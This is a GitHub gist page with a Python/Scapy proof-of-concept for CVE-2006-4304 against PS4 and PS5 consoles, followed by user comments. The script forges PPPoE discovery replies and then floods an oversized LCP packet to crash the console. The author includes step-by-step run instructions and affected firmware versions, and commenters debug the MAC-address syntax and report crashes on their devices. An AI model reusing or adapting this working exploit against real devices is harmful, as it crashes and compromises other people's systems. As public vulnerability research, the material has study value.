Skip to content

Instantly share code, notes, and snippets.

@RobbedColek
Created January 30, 2024 16:02
  • Star 21 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save RobbedColek/8b0bc9655adc6ad9564ad71453188e37 to your computer and use it in GitHub Desktop.
PoC of CVE-2006-4304 for PS4/PS5
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump
source = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of your adapter on PC
destination = b"\xXX\xXX\xXX\xXX\xXX\xXX" # MAC address of LAN on your PS4
interface = "Realtek PCIe 2.5GbE Family Controller #2" # get via "ipconfig /all" or eth0 or similiar on Linux
packet = sniff(iface=interface, filter="pppoed", count=1)
tag_value = packet[PPPoED][0].tag_list[1].tag_value
payload = destination + source + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = destination + source + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
print(hexdump(packet))
payload = destination + source + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * 256 # this number might be different, just a guess
for i in range(20):
sendp(payload, iface=interface)
@RobbedColek
Copy link
Author

Requires Python 3 and Scapy.

  1. Connect your PS4/PS5 directly to PC via LAN cable.
  2. Set up your PS4/PS5 for manual ethernet connection via PPPoE - insert any username/password.
  3. Use "Test Internet Connection" on console.
  4. Launch script.

If it worked, it will crash your console.

Should work on PS4 11.00 and lower, PS5 8.20 and lower.

This is supposedly what theflow0 reported on HackerOne.

@Sergb1970
Copy link

Hello.
I get the following error.
What am I doing wrong?

Python 3.12.1 (tags/v3.12.1:2305ca5, Dec 7 2023, 22:03:25) [MSC v.1937 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license()" for more information.

Warning (from warnings module):
File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 3
source = b"\d8\5e\d3\78\cf\24" # MAC address of your adapter on PC
SyntaxWarning: invalid escape sequence '\d'

Warning (from warnings module):
File "C:\ps5\PS4-PS5-CVE-2006-4304.py", line 4
destination = b"\5c\84\3c\ca\fc\92" # MAC address of LAN on your PS4
SyntaxWarning: invalid escape sequence '\8'

Thank you

@ps3120
Copy link

ps3120 commented Jan 31, 2024

you spelled mac wrong, you have to put x first, example x5c

@Sergb1970
Copy link

Thank you

@V121Coffe
Copy link

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: Syntactic warning: invalid escape sequence '\D'
source = b"\D8\BB\C1\B5\C9\96" # MAC address of your PC adapter
C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:4: Syntactic warning: invalid escape sequence '\9'
destination = b"\bc\60\a7\1a\96\c2" # The MAC address of the local network on your PS4
Backtracking (last call):
File "C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py ", line 7, in
package = sniff(iface=interface, filter="pppoed", count=1)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1311, in the sniff
sniffer._run(*args, **kwargs)
file "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1171, in


How to fix it?

@authrequest
Copy link

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: Syntactic warning: invalid escape sequence '\D' source = b"\D8\BB\C1\B5\C9\96" # MAC address of your PC adapter C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:4: Syntactic warning: invalid escape sequence '\9' destination = b"\bc\60\a7\1a\96\c2" # The MAC address of the local network on your PS4 Backtracking (last call): File "C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py ", line 7, in package = sniff(iface=interface, filter="pppoed", count=1) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1311, in the sniff sniffer._run(*args, **kwargs) file "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", line 1171, in

How to fix it?

Read his solution above. You need the x infront of the characters.

@V121Coffe
Copy link

C:\Users\varlo\OneDrive\Working stol\PS4 11.00\PS4-PS5-CVE-2006-4304.py:3: Синтаксическое предупреждение: недопустимая escape-последовательность '\D' source = b"\D8\BB\C1\B5\C9\96" # MAC-адрес адаптера ПК C:\Users\varlo\OneDrive\Working stol\PS4 11.00[PS4-PS5-CVE-2006-4304.py](https://github.com/advisories/GHSA-2p53-823g-x3xx):4: Синтаксическое предупреждение: недопустимая escape-последовательность '\9' destination = b"\bc\60\a7\1a\96\c2" # MAC-адрес локальной сети на PS4 Backtracking (последний вызов): Файл "C:\Users\varlo\OneDrive\Working stol\PS4 11.00[PS4-PS5-CVE-2006-4304](https://github.com/advisories/GHSA-2p53-823g-x3xx).py ", строка 7, в пакете = sniff(iface=interface, filter="pppoed", count=1) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Файл "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", строка 1311, в файле sniff sniffer._run(*args, **kwargs) "C:\Users\varlo\AppData\Local\Programs\Python\Python312\Lib\site-packages\scapy\sendrecv.py ", строка 1171, в
Как это исправить?

Прочтите его решение выше. Вам нужен x перед символами.

image
Снимок экрана 2024-01-31 233725
?

@ps3120
Copy link

ps3120 commented Jan 31, 2024

Wake up , x in front of the Mac characters

@kinglew1989
Copy link

C:\Users\REY>"C:\Python30\PS4-PS5-CVE-2006-4304.py"
.
After it shuts down my PS5 on 6.02
What's next?
Sent 1 packets.
.
Sent 1 packets.
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets

@8pcd
Copy link

8pcd commented Feb 1, 2024

bro its a poc meaning piece of concept no full jailbreak you have to wait!

@Sergb1970
Copy link

Sergb1970 commented Feb 1, 2024

cable needs straight or reverse?

@MRiCEQB
Copy link

MRiCEQB commented Feb 1, 2024

cable needs straight or reverse?

PS4/5 can do Auto MDI-X, so it doesn't matter.

@lollipop6969
Copy link

proof of concept.

@Drocto1231
Copy link

Will 11.02 be available?

@lewiwiii
Copy link

lewiwiii commented Feb 2, 2024

Will 11.02 be available?

no, this bug has been patched on 11.02

@mbcrump
Copy link

mbcrump commented Feb 6, 2024

I've made a video showing how to set this up from scratch if anyone is interested.

https://www.youtube.com/watch?v=RbGOJGAD0xQ

@unaigonzalezz
Copy link

If anyone is curious, working on PS5 7.61

@sunzhi778
Copy link

零零零零

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment